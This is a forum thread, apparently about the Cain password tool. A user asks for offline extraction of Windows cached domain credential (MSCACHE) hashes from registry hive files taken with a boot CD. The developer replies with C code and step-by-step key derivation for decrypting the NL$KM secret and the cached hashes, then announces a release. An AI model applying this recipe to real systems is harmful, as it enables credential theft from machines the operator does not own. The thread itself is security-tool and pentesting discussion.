Im a user of fantastic cain for long time ;)

I'd like to import the mscache directly from reg files ( gained from boot cd ). SAM, SECURITY and SYSTEM Files should have all informationen needed to extract those hashes ( hopefully).
This feature is very similar to ophcracks load from encrypted SAM . Or like in cain itself get LM Hashes from Sam File.
Importing hashes directly from mentioned reg files would be a hughe improved when pentesting other systems. ( As i can crack them all on one central PC ).
Would it be possible to add such a function ?

thx for your effort and great work

To do that you need to successfully decode the NL$KM key in the "SECURITY" hive file. Using bkhive code this value can be
retrieved using the following code:

struct hive h;
nk_hdr *n = NULL;

char lsasecret_nlkm_key[1024];

_InitHive( &h );

/* Open sam hive */
if( _RegOpenHive("D:\\security", &h ) )
{
// AfxMessageBox("Error opening System file");
return;
}

/* Open SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal key*/
strcpy (lsasecret_nlkm_key,"SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal");
if( _RegOpenKey( &h, lsasecret_nlkm_key, &n ) == -1 )
{
// AfxMessageBox ("Couldn't open current LSA Secret key");
return;
}

unsigned char buffer[64+8+12];
DWORD offset = n->unk4[3];
memcpy (buffer, (unsigned char*) n+offset+4, sizeof(buffer));

The content of "buffer" must now be decrypted. Cain uses the DLL injection method to obtain the unencrypted value but if you want
to get it from hive files you can't dump it immediately from the memory .....
Normally this decryption is done by the operating system by mean of the function SystemFunction005 of ADVAPI32.DLL.

SystemFunction005( NL$KM from the registry, 16_bytes_in_memory_key, nlkmkey) // nlkmkey is the output of 64 bytes

The information you do not have here is the "16_bytes_in_memory_key" and you can't dump this value from the memory because you are working on hive files and usually a different operating system. CacheDump uses the function "getCipherKey" to obtain this parameter directly from the process memory of LSASS.

Supposed that you can successfully obtain the 64 byte value of the decrypted NL$KM key; MSCACHE hashes can be decrypted using the following function as
explained in CacheDump code....

// Decipher the Cache Entry using the LSA Secret NL$KM
int DecryptCacheEntry (unsigned char* data, int datalen, unsigned char* nlkmkey) // 64 bytes NL$KM decrypted key
{
unsigned char digest[ 16 ];
RC4_KEY rc4key;

short user_len = *(short*) (data);
if (user_len<=0) return 0;

// HMAC-MD5 of value with NL$KM
HMAC_MD5 (data+64,16,nlkmkey,64,digest);

// RC$ decryption of data with the above digest
RC4_set_key (&rc4key,16,digest);
RC4(&rc4key,datalen-96,data+96,data+96);

return datalen;
}

It seems that everything you need to do, is to discover how the "16_bytes_in_memory_key" has been created and if it possible to replicate that generation process.....

thanks for that excellent explanation.


Well that seems to be a big task ...
I didn't know that this kind of key lacks when working with files only.

To get a clue in opposite direction :
May i handle a domain system without any local (admin) users as rather secure? As it seems to be impossible to run cashdump successful on that system ( except using 0-day exploits ) ...

Please don't give up so fast ! I'm looking for a way to let your wishes come true ..... If any users have information about this task please post them.

great news ! I will stay tuned :)
Wish you luck to compete this task.

Your wishes come true !!!!
I found the correct way to decrypt MS-CACHE hashes and all other LSA Secrets using SYSTEM and SECURITY hive files only !!!!!

1) first of all you have to recover the syskey (startkey) of 16 bytes from the SYSTEM file; BKHIVE code is already available on Internet ...
2) recover from the SECURITY hive file the value under SECURITY\Policy\PolSecretEncryptionKey; this value is 76 bytes long that must
be interpreted as follows:

unsigned char pol_secret_enc_key[76] = 8 bytes + 4 bytes + 48 encrypted bytes + 16 bytes;

3) Now you have to decode the encrypted 48 bytes with the following algorithm

MD5_CTX ctx;
RC4_KEY rc4_key;
unsigned char final [16];
unsigned char decrypted[48];
memset (decrypted,0,sizeof(decrypted));

MD5_Init (&ctx);
MD5_Update (&ctx, startkey ,16);
for (int i=0; i<1000; i++)
{
MD5_Update (&ctx, pol_secret_enc_key+60 ,16);
}
MD5_Final (final, &ctx);

RC4_set_key(&rc4_key,16,final);
RC4(&rc4_key, 48, pol_secret_enc_key+12 ,decrypted);

unsigned char cipherKey[16];
memcpy(cipherKey,decrypted+16,16);

the cipherKey is now the exact equivalent of the key dumped from the memory by the function _getCipherKey (lsastuff.c) of CacheDump software.

4) You can now use the cipherKey to decrypt the NL$KM value of 64 bytes from the SECURITY hive file

5) Finally you can decrypt MS-CACHE hashes as explained in CacheDump code

thats all.

To the makers of "Lsadump2" and "CacheDump 1.2": you are free to use the above method to improve your software with the ability
to extract information from hive files only ....

wow! Your speed and skill solving this task beats all my expectation .
I'm very impressed and glad you got this done!!!

just two questions :
a) beginners question : where can mentioned types ( MD5_CTX, RC4_KEY ) and functions ( MD5_Init, ... ) be found ? i doubt this are standard c funcs and types.
b) cain fan question : when will new release of cain with this feature be out ?

once again :
great work! this is a huge jump for security tools !

They are cryptographic functions you can find in OpenSSL software



As soon as possible, time permitting.

The new version (3.9) featuring offline MSCACHE dumper is online.

thank you very much for your superb work!